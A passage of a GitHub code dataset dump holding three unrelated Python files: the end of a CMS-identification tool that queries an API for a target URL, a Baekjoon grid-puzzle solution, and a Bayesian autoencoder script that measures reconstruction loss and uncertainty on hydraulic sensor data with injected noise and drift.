Name : \\033[1;96m%s' % (name))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mConfidence : \\033[1;96m%s' % (confidence))\n print('\\033[1;92m[\\033[1;94m*\\033[1;92m] \\033[1;92mCMS URL : \\033[1;96m%s\\033[00m' % (cms_url))\n\n except Exception as error_send_requests:\n print(error_send_requests)\n\n\ndef banner_show():\n try:\n check_cowsay = shutil.which('cowsay')\n if check_cowsay ==None:\n print('\\033[1;91m[!] Cowsay Not Found !')\n os.system('apt update && apt install cowsay -y')\n os.system('cowsay CMS ID V1.0 By Dxvistxr')\n else:\n theme1 = 'cowsay CMS ID v1.0'\n theme2 = 'cowsay -f eyes CMS ID v1.0'\n theme3 = 'cowsay -f tux CMS ID v1.0'\n theme4 = 'cowsay -f bud-frogs CMS ID v1.0'\n choice_banner = [theme1,theme2,theme3,theme4]\n random_choice_banner = random.choice(choice_banner)\n if random_choice_banner ==theme1:\n os.system(random_choice_banner)\n print(banner_font)\n\n elif random_choice_banner ==theme2:\n os.system(random_choice_banner)\n print(banner_font)\n\n elif random_choice_banner ==theme3:\n os.system(random_choice_banner)\n print(banner_font)\n\n elif random_choice_banner ==theme4:\n os.system(random_choice_banner)\n print(banner_font)\n\n except Exception as error_banner:\n print(error_banner)\n\n\ndef main():\n check_platform()\n check_python_version()\n banner_show()\n parser = argparse.ArgumentParser()\n parser.add_argument('key',type=str,help='Set API Key')\n parser.add_argument('url',type=str,help='Set Target Url')\n args = parser.parse_args()\n send_requests(args.key,args.url)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"HiFeV/Train-2018-2020","sub_path":"CMSID/cmsid.py","file_name":"cmsid.py","file_ext":"py","file_size_in_byte":4148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40450337975","text":"from collections import deque\ndx,dy=(-1,1,0,0),(0,0,-1,1)\n\ndef bfs(i,j,val):\n visit = [[0] * n for _ in range(n)]\n q=deque()\n q.append((i,j))\n visit[i][j]=1\n group=[(i,j)]\n while q:\n x,y = q.popleft()\n for dir in range(4):\n nx,ny=x+dx[dir], y+dy[dir]\n if 0<=nx 0:\n tmpGroup,tmpX,tmpY,tmpRainbowCnt = bfs(i,j,maps[i][j])\n if tmpGroup == -1:\n continue\n if len(tmpGroup) > len(blockGroup):\n 
blockGroup,stX,stY,rainbowCnt = tmpGroup,tmpX,tmpY,tmpRainbowCnt\n elif len(tmpGroup) == len(blockGroup):\n if tmpRainbowCnt > rainbowCnt:\n blockGroup, stX, stY, rainbowCnt = tmpGroup, tmpX, tmpY, tmpRainbowCnt\n elif tmpRainbowCnt == rainbowCnt:\n if tmpX > stX:\n blockGroup, stX, stY, rainbowCnt = tmpGroup, tmpX, tmpY, tmpRainbowCnt\n elif tmpX == stX:\n if tmpY > stY:\n blockGroup, stX, stY, rainbowCnt = tmpGroup, tmpX, tmpY, tmpRainbowCnt\n if len(blockGroup)==0:\n break\n result+=len(blockGroup)**2\n for x,y in blockGroup:\n maps[x][y]=-2\n gravity()\n rotate()\n gravity()\n\nprint(result)","repo_name":"jihyeong2/TIL","sub_path":"baekjoon/Code/상어중학교_21609.py","file_name":"상어중학교_21609.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"72695270187","text":"from sklearn.preprocessing import MinMaxScaler, RobustScaler, StandardScaler\nfrom bnn.ensembles_bnn import BAE_Ensemble_Manager\nimport pickle\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom bnn.multiscaler import MultiScaler\nimport copy\nfrom bnn.seed import bae_set_seed\nfrom mpl_toolkits.mplot3d import Axes3D\nimport torch\n\nbae_set_seed(100)\n\n#LOAD DATA\ntotal_sensors = 17\nsensor_names = [\"ts1\",\"ts2\",\"ts3\",\"ts4\",\"vs1\",\"se\",\"ce\",\"cp\"]+[\"fs1\",\"fs2\"]+[\"ps1\",\"ps2\",\"ps3\",\"ps4\",\"ps5\",\"ps6\",\"eps1\"]\npickle_path=\"pickles/\"\ndata_raw = pickle.load(open(pickle_path+\"data_ft_resampled.p\", \"rb\" ) )\nx_train, x_test, x_ood, x_test_noise,x_test_drift, = data_raw['x_train'], data_raw['x_test'], data_raw['x_ood'], data_raw['x_test_noise'], data_raw['x_test_drift']\ny_train, y_test, y_ood = data_raw['y_train'], data_raw['y_test'], data_raw['y_ood']\n\ndef flatten_dimensions(np_array):\n return np_array.reshape(np_array.shape[0],-1)\n\ndef nested_list_apply(x_list, apply_func, *args, **kwargs):\n x_list_result = []\n for sensor_data in x_list:\n temp_data = []\n for noise_data in sensor_data:\n temp_data.append(apply_func(noise_data, *args, **kwargs))\n x_list_result.append(temp_data)\n return x_list_result\n\n#normalise data\nscaler_class = MultiScaler\nscaler = scaler_class(scaler_class=StandardScaler)\nx_train = scaler.fit_transform(x_train)\nx_test = scaler.transform(x_test)\nx_ood = scaler.transform(x_ood)\n\nx_test_noise = nested_list_apply(x_test_noise, scaler.transform)\nx_test_drift = nested_list_apply(x_test_drift, scaler.transform)\n\n#reshape to flatten last two dimensions to fit bnn\nx_train = x_train.reshape(x_train.shape[0],-1)\nx_test = x_test.reshape(x_test.shape[0],-1)\nx_ood = x_ood.reshape(x_ood.shape[0],-1)\nx_test_noise = nested_list_apply(x_test_noise, flatten_dimensions)\nx_test_drift = nested_list_apply(x_test_drift, flatten_dimensions)\n\n#define model\noptimiser = \"Adam\"\nnum_epoch_mu = 100 #10000 #1000\narchitecture_mu = [500,250,3,250,500]\narchitecture_sig_diag_cov=architecture_mu\nlr = 0.0008\nnum_samples = 10\nuse_cuda = torch.cuda.is_available()\n\n#diag_cov & combined mode\nmodel_name = \"diag_cov\"\nbae_model = BAE_Ensemble_Manager(architecture=architecture_mu, num_samples=num_samples,\n num_epoch=num_epoch_mu, learning_rate=lr, bottleneck_layer=2,\n task=\"regression\", optimiser=optimiser, mode=\"diag_cov\", use_cuda=use_cuda)\n\n#fit model\nbae_model.fit(x_train)\n\n#predictions\nresult_test = bae_model.predict(x_test, mode=model_name)\nresult_ood = bae_model.predict(x_ood, mode=model_name)\nresult_noise = nested_list_apply(x_test_noise, 
bae_model.predict, mode=model_name)\nresult_drift = nested_list_apply(x_test_drift, bae_model.predict, mode=model_name)\nresult_test_mu = bae_model.predict(x_test, mode=\"mu\")\nresult_ood_mu = bae_model.predict(x_ood, mode=\"mu\")\nresult_noise_mu = nested_list_apply(x_test_noise, bae_model.predict, mode=\"mu\")\nresult_drift_mu = nested_list_apply(x_test_drift, bae_model.predict, mode=\"mu\")\n\n#compute more accurate epistemic unc.\ndef unc_scale(result,seq_len=60,num_sens=17):\n raw_y_pred=result['raw'][0]\n scaled_raw_y_pred = []\n raw_y_cov=result['raw'][1]\n scaled_raw_y_cov = []\n for i in range(len(raw_y_pred)):\n scaled_raw_y_pred.append(scaler.inverse_transform(raw_y_pred[i,:,:].reshape(-1,seq_len,num_sens)))\n scaled_raw_y_cov.append(scaler.inverse_variance((raw_y_cov[i,:,:]**0.5).reshape(-1,seq_len,num_sens)))\n scaled_raw_y_pred= np.array(scaled_raw_y_pred)\n scaled_raw_y_cov= np.array(scaled_raw_y_cov)\n epi_result = scaled_raw_y_pred.std(0)\n alea_result = scaled_raw_y_cov.mean(0)\n total_unc = epi_result+alea_result\n return epi_result, alea_result,total_unc\n\ndef alea_unc_scale(result,seq_len=60,num_sens=17):\n temp_res = copy.copy(result['y_cov'][0])\n temp_res= temp_res.reshape(-1,seq_len,num_sens)**0.5\n temp_res = scaler.inverse_variance(temp_res)\n return temp_res\n\ndef str_deci(number,num_deci=2):\n return (\"{0:.\"+str(num_deci)+\"f}\").format(round(number,num_deci))\n\n#plot reconstructed signal\nplot_sample_index = 100\nplot_sensor_index = 10\nseverity_index = 2\nn_resample = 60\n\ndef get_recon_signal(mode=\"noise\",plot_sample_index = 1,plot_sensor_index =12,n_resample = 60,severity_index = 0):\n # feature_sensor_indices = range((n_resample*plot_sensor_index),(n_resample*(1+plot_sensor_index)))\n if mode == \"noise\":\n recon_sig=scaler.inverse_transform(result_noise[plot_sensor_index][severity_index]['y_pred'][0].reshape(-1,n_resample,total_sensors))\n recon_sig_epi_unc,recon_sig_alea_unc,recon_sig_total_unc=unc_scale(result_noise[plot_sensor_index][severity_index])\n ori_sig = scaler.inverse_transform(x_test_noise[plot_sensor_index][severity_index].reshape(-1,n_resample,total_sensors))\n elif mode==\"drift\":\n recon_sig=scaler.inverse_transform(result_drift[plot_sensor_index][severity_index]['y_pred'][0].reshape(-1,n_resample,total_sensors))\n recon_sig_epi_unc,recon_sig_alea_unc,recon_sig_total_unc=unc_scale(result_drift[plot_sensor_index][severity_index])\n ori_sig = scaler.inverse_transform(x_test_drift[plot_sensor_index][severity_index].reshape(-1,n_resample,total_sensors))\n else:\n recon_sig=scaler.inverse_transform(result_ood['y_pred'][0].reshape(-1,n_resample,total_sensors))\n recon_sig_epi_unc,recon_sig_alea_unc,recon_sig_total_unc=unc_scale(result_ood)\n ori_sig = scaler.inverse_transform(x_ood.reshape(-1,n_resample,total_sensors))\n\n recon_loss = ((recon_sig - ori_sig)**2)\n\n plot_recon_sig = recon_sig[plot_sample_index,:,plot_sensor_index]\n plot_ori_sig = ori_sig[plot_sample_index,:,plot_sensor_index]\n plot_recon_loss = recon_loss[plot_sample_index,:,plot_sensor_index]\n epi_unc =recon_sig_epi_unc[plot_sample_index,:,plot_sensor_index]\n alea_unc =recon_sig_alea_unc[plot_sample_index,:,plot_sensor_index]\n total_unc = recon_sig_total_unc[plot_sample_index,:,plot_sensor_index]\n\n return {\"recon_sig\":plot_recon_sig,\n \"ori_sig\":plot_ori_sig,\n \"recon_loss\":plot_recon_loss,\n \"epi_unc\":epi_unc,\n \"alea_unc\":alea_unc,\n \"total_unc\":total_unc\n }\n\n#PLOT RECONSTRUCTED SIGNAL\nrecon_signal_test = get_recon_signal(plot_sample_index = 
plot_sample_index, plot_sensor_index=plot_sensor_index, severity_index=0)\nrecon_signal_noise = get_recon_signal(mode=\"noise\", plot_sample_index=plot_sample_index, plot_sensor_index=plot_sensor_index, severity_index=severity_index)\nrecon_signal_ood = get_recon_signal(mode=\"ood\", plot_sample_index=plot_sample_index, plot_sensor_index=plot_sensor_index)\nrecon_signal_drift = get_recon_signal(mode=\"drift\", plot_sample_index=plot_sample_index, plot_sensor_index=plot_sensor_index, severity_index=severity_index)\n\n\nfig, axes = plt.subplots(2,2, figsize=(5,5),dpi=250)\naxes = axes.reshape(-1)\nplot_titles = [\"a) Normal\", \"b) Cooler Condition (3%)\", \"c) Injected Noise (10%)\",\"d) Injected Drift (10%)\"]\nax_ids = np.arange(len(axes))\nfor ax_id,ax,recon_signal,plot_title in zip(ax_ids,axes,[recon_signal_test,recon_signal_ood,recon_signal_noise,recon_signal_drift],plot_titles):\n    plot_recon_sig,plot_ori_sig,recon_loss,epi_unc,alea_unc,total_unc = recon_signal['recon_sig'],recon_signal['ori_sig'],recon_signal['recon_loss'],recon_signal['epi_unc'],recon_signal['alea_unc'],recon_signal['total_unc']\n    ax.plot(plot_recon_sig)\n    ax.plot(plot_ori_sig)\n    ax.fill_between(range(n_resample), (plot_recon_sig+alea_unc), (plot_recon_sig-alea_unc),alpha=0.5,color='g')\n    ax.fill_between(range(n_resample), (plot_recon_sig+epi_unc+alea_unc), (plot_recon_sig+alea_unc),alpha=0.5,color='r')\n    ax.fill_between(range(n_resample), (plot_recon_sig-alea_unc), (plot_recon_sig-epi_unc-alea_unc),alpha=0.5,color='r')\n\n    recon_loss_mean,epi_unc_mean, alea_unc_mean, total_unc_mean = recon_loss.mean(),epi_unc.mean(),alea_unc.mean(),epi_unc.mean()+alea_unc.mean()\n\n    ax.legend([\"Reconstructed\",\"Measured\",\"Aleatoric\",\"Epistemic\"],prop={'size': 6})\n    if ax_id == 2 or ax_id == 3:\n        ax.set_xlabel(\"Time(s)\")\n    if ax_id == 0 or ax_id == 2:\n        ax.set_ylabel(\"Pressure (Bar)\")\n    ax.set_title(plot_title,fontsize=8)\n    ax.text(0.35, 0.95,'Loss:'+str_deci(recon_loss_mean,2), ha='center', va='center', transform=ax.transAxes,fontsize=6)\n\n#Reconstruction loss\ndef vanilla_recon_loss(x_test,result_mu):\n    return ((result_mu['y_pred'][0]-x_test)**2).mean(1)\n\ndef get_nested_recon_loss(result,x_test):\n    return [vanilla_recon_loss(x_test[id_],result[id_]) for id_, noise_data in enumerate(result)]\n\nrecon_test = vanilla_recon_loss(x_test,result_test_mu)\nrecon_ood = vanilla_recon_loss(x_ood,result_ood_mu)\nrecon_noise = []\nrecon_drift = []\n\nfor sensor_id,sensor_data in enumerate(result_noise_mu):\n    temp_data_noise = []\n    temp_data_drift = []\n    for noise_id,noise_data in enumerate(sensor_data):\n        temp_data_noise.append(vanilla_recon_loss(x_test_noise[sensor_id][noise_id],sensor_data[noise_id]))\n        temp_data_drift.append(vanilla_recon_loss(x_test_drift[sensor_id][noise_id],sensor_data[noise_id]))\n    recon_noise.append(temp_data_noise)\n    recon_drift.append(temp_data_drift)\n\ndef mean_unc(result_data,seq_len=60,num_sens=17):\n    epi,alea,total = unc_scale(result_data,seq_len=seq_len,num_sens=num_sens)\n    epi = epi.reshape(-1,seq_len*num_sens)\n    alea = alea.reshape(-1,seq_len*num_sens)\n    total = total.reshape(-1,seq_len*num_sens)\n\n    return epi.mean(1), alea.mean(1), total.mean(1)
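\n\n# Editor-added illustrative sketch (hedged; not part of the original script).\n# It mirrors the decomposition used in unc_scale/mean_unc on synthetic numbers:\n# epistemic = spread of the ensemble means, aleatoric = mean predicted spread.\ndef _editor_unc_decomposition_demo(n_members=10, n_outputs=5):\n    mus = np.random.randn(n_members, n_outputs)\n    sigmas = np.abs(np.random.randn(n_members, n_outputs))\n    epi = mus.std(0)\n    alea = sigmas.mean(0)\n    return epi, alea, epi + alea  # total predictive uncertainty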
mean by the last dimension (expected as the number of features)\n \"\"\"\n batch_cov_mat_y_cov = batch_cov_mat['y_cov'][index_alea]\n if len(batch_cov_mat_y_cov.shape) ==3:\n #extract diagonal of cov. matrix\n iii,jjj = np.diag_indices(batch_cov_mat_y_cov.shape[-1])\n alea_temp = batch_cov_mat_y_cov[...,iii,jjj]\n else:\n alea_temp = batch_cov_mat_y_cov\n alea_temp = (alea_temp**0.5).mean(-1)\n return alea_temp\n\n#argwhere to separate by severity of condition\nindex_target = 0\ncolumns_ood = np.unique(y_ood[:,index_target])\nindex_ood = []\n\nfor unique_condition in columns_ood:\n index_ood += [np.argwhere(y_ood[:,index_target] == unique_condition).reshape(-1)]\n\n#PLOTS FOR VARYING CONDITION\n# plot - recon loss\nshow_outliers = False\nrecon_loss_plot =[]\nrecon_loss_plot += [recon_test]\nfor i in index_ood:\n recon_loss_plot += [recon_ood[i]]\n\n# plot - epistemic uncertainty\nepi_unc_plot =[]\nepi_unc_plot += [epi_test]\nfor i in index_ood:\n epi_unc_plot += [epi_ood[i]]\n\n#plot - aleatoric uncertainty (diagonal cov)\nalea_unc_plot =[]\nalea_unc_plot += [alea_test]\nfor i in index_ood:\n alea_unc_plot += [alea_ood[i]]\n\nfigsize = (6,3)\ndpi = 250\nfig, (ax1,ax2,ax3) = plt.subplots(1,3,figsize=figsize,dpi=dpi)\n\nx_tick_labels_eff = ('100', '20', '3')\nax1.boxplot(recon_loss_plot,showfliers=show_outliers)\nax1.set_xticklabels( x_tick_labels_eff)\nax1.set_ylabel(\"Reconstruction loss\")\nax1.set_xlabel(\"Condition (%)\")\n\nax2.boxplot(epi_unc_plot,showfliers=show_outliers)\nax2.set_xticklabels(x_tick_labels_eff)\nax2.set_ylabel(\"Epistemic uncertainty\")\nax2.set_xlabel(\"Condition (%)\")\n\nax3.boxplot(alea_unc_plot,showfliers=show_outliers)\nax3.set_xticklabels(x_tick_labels_eff)\nax3.set_ylabel(\"Aleatoric uncertainty\")\nax3.set_xlabel(\"Condition (%)\")\n\nplt.ticklabel_format(axis=\"y\", style=\"sci\", scilimits=(0,0))\nplt.show()\nplt.tight_layout()\n\n#plot noise level\nnp_unc_result_noise = np.array(unc_result_noise)\nnp_unc_result_drift = np.array(unc_result_drift)\n\n\n#Plot single row for drifts\n#set plot sensor id here to show the sensitivity of metrics toward injected drifts\nfigsize = (6,3)\ndpi = 250\nfig, axes = plt.subplots(1,3,figsize=figsize,dpi=dpi)\nsensor_id = 10\n# x_tick_labels_eff = ('0', '1', '2', '3', '4', '5')\nx_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\naxes[0].boxplot(recon_drift[sensor_id],showfliers=show_outliers)\naxes[0].set_xticklabels(x_tick_labels_eff)\naxes[0].set_ylabel(\"Reconstruction loss\")\naxes[0].set_xlabel(\"Injected Drift (%)\")\n\naxes[1].boxplot(np_unc_result_drift[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\naxes[1].set_xticklabels(x_tick_labels_eff)\naxes[1].set_ylabel(\"Epistemic uncertainty\")\naxes[1].set_xlabel(\"Injected Drift (%)\")\n\naxes[2].boxplot(np_unc_result_drift[sensor_id,:,1,:].tolist(),showfliers=show_outliers)\naxes[2].set_xticklabels(x_tick_labels_eff)\naxes[2].set_ylabel(\"Aleatoric uncertainty\")\naxes[2].set_xlabel(\"Injected Drift (%)\")\nplt.show()\nplt.tight_layout()\n\n#Plot single row for noise\n#set plot sensor id here to show the sensitivity of metrics toward injected noise\n\nfig, axes = plt.subplots(1,3,figsize=figsize,dpi=dpi)\nsensor_id = 10\nx_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\naxes[0].boxplot(recon_noise[sensor_id],showfliers=show_outliers)\naxes[0].set_xticklabels(x_tick_labels_eff)\naxes[0].set_ylabel(\"Reconstruction loss\")\naxes[0].set_xlabel(\"Injected Noise 
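# --- Hedged editor's sketch: extracting per-feature variances from a batch of
# --- covariance matrices, the same fancy-indexing trick used by mean_alea_unc().
import numpy as np

batch_cov = np.stack([np.diag([1.0, 2.0, 3.0]) for _ in range(4)])  # (4, 3, 3)
iii, jjj = np.diag_indices(batch_cov.shape[-1])
variances = batch_cov[..., iii, jjj]                                # (4, 3)
# np.diagonal is an equivalent one-liner:
assert np.allclose(variances, np.diagonal(batch_cov, axis1=-2, axis2=-1))
print((variances ** 0.5).mean(-1))  # mean std per matrix, as in mean_alea_unc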
(%)\")\n\naxes[1].boxplot(np_unc_result_noise[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\naxes[1].set_xticklabels(x_tick_labels_eff)\naxes[1].set_ylabel(\"Epistemic uncertainty\")\naxes[1].set_xlabel(\"Injected Noise (%)\")\n\naxes[2].boxplot(np_unc_result_noise[sensor_id,:,1,:].tolist(),showfliers=show_outliers)\naxes[2].set_xticklabels(x_tick_labels_eff)\naxes[2].set_ylabel(\"Aleatoric uncertainty\")\naxes[2].set_xlabel(\"Injected Noise (%)\")\nplt.show()\nplt.tight_layout()\n\n#plot cov. matrix\nif model_name == \"full_cov\":\n plot_sample_index = 20\n y_cov_mu_test = result_test['y_cov'][0][0]\n y_cov_mu_ood_0 = result_ood['y_cov'][0][index_ood[0][plot_sample_index]]\n y_cov_mu_ood_1 = result_ood['y_cov'][0][index_ood[1][plot_sample_index]]\n\n y_cov_list = [y_cov_mu_test,y_cov_mu_ood_0,y_cov_mu_ood_1]\n plot_name_list = [\"y_cov_mu_test\",\"y_cov_mu_ood_0\",\"y_cov_mu_ood_1\"]\n\n#plot for increasing noise\nif model_name == \"full_cov\":\n plot_sample_index = 0\n\n y_cov_mu_noise = [noise_data['y_cov'][0][0] for noise_data in result_noise]\n y_cov_mu_drift = [drift_data['y_cov'][0][0] for drift_data in result_drift]\n\n plot_name_noise_list = [str(i)+\"_Noise\" for i in range(len(y_cov_mu_noise))]\n plot_name_drift_list = [str(i)+\"_Drift\" for i in range(len(y_cov_mu_drift))]\n\n\n matrix_list = [y_cov_mu_test,y_cov_mu_ood_1,y_cov_mu_noise[-1],y_cov_mu_drift[-1]]\n vmin, vmax = np.array(matrix_list).min(),np.array(matrix_list).max()\n num_plots = len(matrix_list)\n\n fig, axes = plt.subplots(2,2)\n axes = axes.reshape(-1)\n sup_titles = [\"a) Healthy condition\",\"b) Near breakdown\",\"c) Injected Noise (5%)\",\"d) Injected Drift (5 bar)\"]\n for id_,cov_mat in enumerate(matrix_list):\n im = axes[id_].imshow(matrix_list[id_],cmap='viridis')\n axes[id_].set_title(sup_titles[id_])\n plt.colorbar(im, ax=axes[id_])\n\n#plot colored samples\nresult_plot = result_ood\nnum_colored_samples = 30\nindex_sample = np.arange(0,num_colored_samples)\n\nepi_sample = np.transpose(result_plot['y_pred'][1][index_sample])\nrecon_sample = np.transpose((result_plot['y_pred'][0][index_sample]-x_test_noise[1][0][index_sample])**1)\nrecon_sample = np.abs(recon_sample)\nalea_sample = np.transpose(result_plot['y_cov'][0][index_sample])\n\nnum_sensors = 17\nepi_sample_reshuffled = np.zeros((num_sensors,num_colored_samples))\nrecon_sample_reshuffled = np.zeros((num_sensors,num_colored_samples))\nalea_sample_reshuffled = np.zeros((num_sensors,num_colored_samples))\n\nfeature_sensor_index =np.arange(60)*17\nfeature_sensor_index_list = []\n\n#create index\nfor i in range(17):\n start_index = i*60\n end_index = (i+1)*60\n feature_sensor_index_list.append(copy.copy(feature_sensor_index)+i)\n epi_sample_reshuffled[i,:]=epi_sample[feature_sensor_index_list[-1],:].mean(0)\n recon_sample_reshuffled[i,:]=recon_sample[feature_sensor_index_list[-1],:].mean(0)\n alea_sample_reshuffled[i,:]=alea_sample[feature_sensor_index_list[-1],:].mean(0)\n\n#3D Coordinate plot\nfig = plt.figure(dpi=250)\nax = fig.add_subplot(111, projection='3d')\n\nmarker_alpha = 0.6\nmarker_size = 15\nz_scaler = 1e-3\nfor plot_ood_index in [0,1,2]:\n ax.scatter(recon_loss_plot[plot_ood_index], epi_unc_plot[plot_ood_index], alea_unc_plot[plot_ood_index]*z_scaler, alpha=marker_alpha, s=marker_size)\n\nlegend_list = [\"Healthy\", \"Cooler Cond. (20%)\", \"Cooler Cond. 
(5%)\"]\n\nfor plot_drift_level_index in [1,2,3,4]:\n ax.scatter(recon_drift[sensor_id][plot_drift_level_index], np_unc_result_drift[sensor_id,plot_drift_level_index,0,:], np_unc_result_drift[sensor_id,plot_drift_level_index,1,:]*z_scaler, marker='^', alpha=marker_alpha,s=marker_size)\n legend_list.append(\"Inj. Drift (\"+str(x_tick_labels_eff[plot_drift_level_index])+\"%)\")\n\nfor plot_noise_level_index in [1,2,3,4]:\n ax.scatter(recon_noise[sensor_id][plot_noise_level_index], np_unc_result_noise[sensor_id,plot_noise_level_index,0,:], np_unc_result_noise[sensor_id,plot_noise_level_index,1,:]*z_scaler, marker='x', alpha=marker_alpha,s=marker_size)\n legend_list.append(\"Inj. Noise (\"+str(x_tick_labels_eff[plot_noise_level_index])+\"%)\")\n\nax.set_xlabel('Reconstruction Loss')\nax.set_ylabel('Epistemic Uncertainty')\nax.set_zlabel('Aleatoric Uncertainty')\n\nax.legend(legend_list, prop={'size': 8})\nax.text2D(0.06, 0.81, '$\\\\times 10^{3}$', transform=ax.transAxes)\n\n#========Unsupervised clustering==========\n# unsupervised_data = []\n# unsupervised_labels_true = []\n# z_scaler = 1e-6\n# for plot_ood_index,label_index in zip([0,1,2],[0,1,2]):\n# real_drifts = np.array([recon_loss_plot[plot_ood_index],\n# epi_unc_plot[plot_ood_index],\n# alea_unc_plot[plot_ood_index]*z_scaler]\n# )\n# unsupervised_data.append(real_drifts)\n# unsupervised_labels_true.append(np.ones_like(recon_loss_plot[plot_ood_index]) * label_index)\n# for plot_drift_level_index,label_index in zip([1,2,3,4],[3,4,5,6]):\n# injected_drifts = np.array([recon_drift[sensor_id][plot_drift_level_index],\n# np_unc_result_drift[sensor_id,plot_drift_level_index,0,:],\n# np_unc_result_drift[sensor_id,plot_drift_level_index,1,:]*z_scaler])\n# unsupervised_data.append(injected_drifts)\n# unsupervised_labels_true.append(np.ones_like(recon_drift[sensor_id][plot_drift_level_index]) * label_index)\n# for plot_noise_level_index,label_index in zip([1,2,3,4],[7,8,9,10]):\n# injected_noise = np.array([recon_noise[sensor_id][plot_noise_level_index],\n# np_unc_result_noise[sensor_id,plot_noise_level_index,0,:],\n# np_unc_result_noise[sensor_id,plot_noise_level_index,1,:]*z_scaler])\n# unsupervised_data.append(injected_noise)\n# unsupervised_labels_true.append(np.ones_like(recon_noise[sensor_id][plot_noise_level_index]) * label_index)\n#\n#\n# unsupervised_data = np.concatenate(unsupervised_data,axis=1)\n# unsupervised_data = np.moveaxis(unsupervised_data, 0,1)\n# unsupervised_labels_true = np.concatenate(unsupervised_labels_true).astype(\"int\")\n#\n# from sklearn import metrics\n# from sklearn.cluster import KMeans, AgglomerativeClustering, DBSCAN\n# from sklearn.preprocessing import StandardScaler\n# #split 70-30?\n#\n# def dbscan_predict(model, X):\n#\n# nr_samples = X.shape[0]\n#\n# y_new = np.ones(shape=nr_samples, dtype=int) * -1\n#\n# for i in range(nr_samples):\n# diff = model.components_ - X[i, :] # NumPy broadcasting\n#\n# dist = np.linalg.norm(diff, axis=1) # Euclidean distance\n#\n# shortest_dist_idx = np.argmin(dist)\n#\n# if dist[shortest_dist_idx] < model.eps:\n# y_new[i] = model.labels_[model.core_sample_indices_[shortest_dist_idx]]\n#\n# return y_new\n#\n# #train unsupervised k-means\n# sil_scores = []\n# # unsupervised_train = unsupervised_data[:,[0,1]]\n# # unsupervised_train = unsupervised_data[:,[1,2]]\n# # unsupervised_train = unsupervised_data[:,[0,1,2]]\n# unsupervised_train = unsupervised_data[:,[0]]\n# n_clusters_range= np.arange(3,20)\n#\n# # for n_clusters in n_clusters_range:\n# # kmeans_model = 
KMeans(n_clusters=n_clusters, random_state=10).fit(unsupervised_train)\n# # trained_labels = kmeans_model.labels_\n# # sil_score = metrics.silhouette_score(unsupervised_train, trained_labels, metric='euclidean')\n# # print(sil_score)\n# # sil_scores.append(sil_score)\n# # best_n_clusters = n_clusters_range[np.argmax(sil_scores)]\n# # print(\"BEST N CLUSTERS:{}\".format(best_n_clusters))\n# # print(\"SILHOUTTE SCORE:{}\".format(np.max(sil_scores)))\n#\n# best_n_clusters = 11\n# # unsupervised_model = KMeans(n_clusters=best_n_clusters).fit(unsupervised_train)\n# # unsupervised_model = AgglomerativeClustering().fit(unsupervised_train)\n# unsupervised_model = DBSCAN(eps=2, min_samples=5).fit(unsupervised_train)\n#\n# #predict using k-means\n# # unsupervised_labels_pred = unsupervised_model.predict(unsupervised_train)\n# # unsupervised_labels_pred = AgglomerativeClustering(n_clusters=11).fit_predict(unsupervised_train)\n# unsupervised_labels_pred = dbscan_predict(unsupervised_model,unsupervised_train)\n# nmi_score = metrics.normalized_mutual_info_score(unsupervised_labels_true, unsupervised_labels_pred)\n# fowlkes_mallows_score = metrics.fowlkes_mallows_score(unsupervised_labels_true, unsupervised_labels_pred)\n# ajrand_score = metrics.adjusted_rand_score(unsupervised_labels_true, unsupervised_labels_pred)\n# sil_score = metrics.silhouette_score(unsupervised_train, unsupervised_labels_pred, metric='euclidean')\n# print(nmi_score)\n# print(ajrand_score)\n# print(fowlkes_mallows_score)\n# print(sil_score)\n#\n# fig = plt.figure(dpi=250)\n# ax = fig.add_subplot(111, projection='3d')\n# ax.scatter(unsupervised_data[:,0],unsupervised_data[:,1],unsupervised_data[:,2], c=unsupervised_labels_pred)\n#\n#\n#\n#\n# #==============ADDITIONAL PLOTS===============\n# fig, axes = plt.subplots(total_sensors,3)\n# for sensor_id in range(total_sensors):\n# x_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\n# axes[sensor_id,0].boxplot(recon_noise[sensor_id],showfliers=show_outliers)\n# axes[sensor_id,0].set_xticklabels(x_tick_labels_eff)\n# axes[sensor_id,0].set_ylabel(sensor_names[sensor_id].upper())\n#\n# axes[sensor_id,1].boxplot(np_unc_result_noise[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,1].set_xticklabels(x_tick_labels_eff)\n# axes[sensor_id,2].boxplot(np_unc_result_noise[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,2].set_xticklabels(x_tick_labels_eff)\n#\n# fig, axes = plt.subplots(total_sensors,3)\n# for sensor_id in range(total_sensors):\n# x_tick_labels_eff = ('0', '5', '10', '15', '20', '25')\n# axes[sensor_id,0].boxplot(recon_drift[sensor_id],showfliers=show_outliers)\n# axes[sensor_id,0].set_xticklabels(x_tick_labels_eff)\n# axes[sensor_id,0].set_ylabel(sensor_names[sensor_id].upper())\n#\n# axes[sensor_id,1].boxplot(np_unc_result_drift[sensor_id,:,0,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,1].set_xticklabels(x_tick_labels_eff)\n#\n# axes[sensor_id,2].boxplot(np_unc_result_drift[sensor_id,:,1,:].tolist(),showfliers=show_outliers)\n# axes[sensor_id,2].set_xticklabels(x_tick_labels_eff)\n#\n#\n\n#=======PLOT LATENT VARIABLE===========\n# from sklearn.decomposition import PCA\n#\n# sensor_index = 10\n# alea_index = 0\n# epi_index = 1\n# alea_key = 'y_cov'\n# severity_index = 2\n#\n# squared = 1\n#\n# epi_sample_noise = (result_noise[sensor_index][severity_index]['y_pred'][epi_index][index_sample])**squared\n# epi_sample_drift = (result_drift[sensor_index][severity_index]['y_pred'][epi_index][index_sample])**squared\n# 
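# --- Hedged editor's sketch: the silhouette sweep that the commented-out block
# --- above performs, reduced to a runnable toy example.
import numpy as np
from sklearn.cluster import KMeans
from sklearn.metrics import silhouette_score

X = np.vstack([np.random.randn(40, 2) + c for c in ((0, 0), (6, 0), (0, 6))])
scores = {}
for k in range(2, 8):
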